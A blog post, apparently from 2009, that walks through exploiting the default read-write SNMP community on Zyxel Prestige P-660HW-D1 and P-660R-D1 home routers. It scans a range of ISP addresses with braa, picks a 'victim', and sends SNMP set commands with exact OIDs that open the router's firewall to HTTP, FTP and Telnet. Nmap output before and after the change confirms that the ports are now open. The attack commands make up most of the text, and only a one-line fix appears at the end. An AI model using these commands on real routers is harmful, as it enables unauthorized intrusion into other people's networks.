This page looks best with JavaScript enabled

Default SNMP PrestigeP660HWD1

 ·  🎃 kr0m

Hello friends, this time I bring you top-notch material ;), it’s about how to modify filtering rules on Zyxel Prestige P-660HW-D1, P-660R-D1 routers via SNMP. These devices come configured with a default community for both reading and writing, so the device can be configured remotely via SNMP.

To begin, let’s download and compile the braa tool, which is an SNMP scanner.

emerge -av net-analyzer/braa

Now that we have braa on our system, we request an OID for a range of addresses. This OID is to request the system name from Zyxel equipment (each manufacturer uses its own MIB).

braa public@88.18.11.1-88.18.11.254 :161:.1.3.6.1.2.1.1.1.0

Now we just need to select the victim.

We check that the ports are closed:

nmap -p 80,21,23 88.22.xyz.100

Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:12 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

Now we open them.

For P-660HW-D1 models:

braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i81 –> We open port 80
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22 –> We open port 21
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24 –> We open port 23

It can be deduced that the logic is port+1, we want to open port 80 –> i"port+1" –> i80+1 –> i81

We check that they are really open:

nmap -p 80,21,23 88.22.xyz.100

Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:09 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http

To leave it as before:

braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
braa -v -t 5 -p 200 public@88.22.xyz.100 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23

We check that they are closed again.

nmap -p 80,21,23 88.22.xyz.100

Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:12 CEST
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100):
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http

You see, it seems incredible, but I can attest that it works ;)

In the P-660R-D1 model:

braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i81
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
braa -v -t 5 -p 200 public@88.22.xyz.244 :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23

To remedy all this, SNMP will have to be configured with a less known community, hehehe.

People usually don’t change the default password of home routers since they disable access on the WAN interface, but this way BANG!! we are inside.

If you liked the article, you can treat me to a RedBull here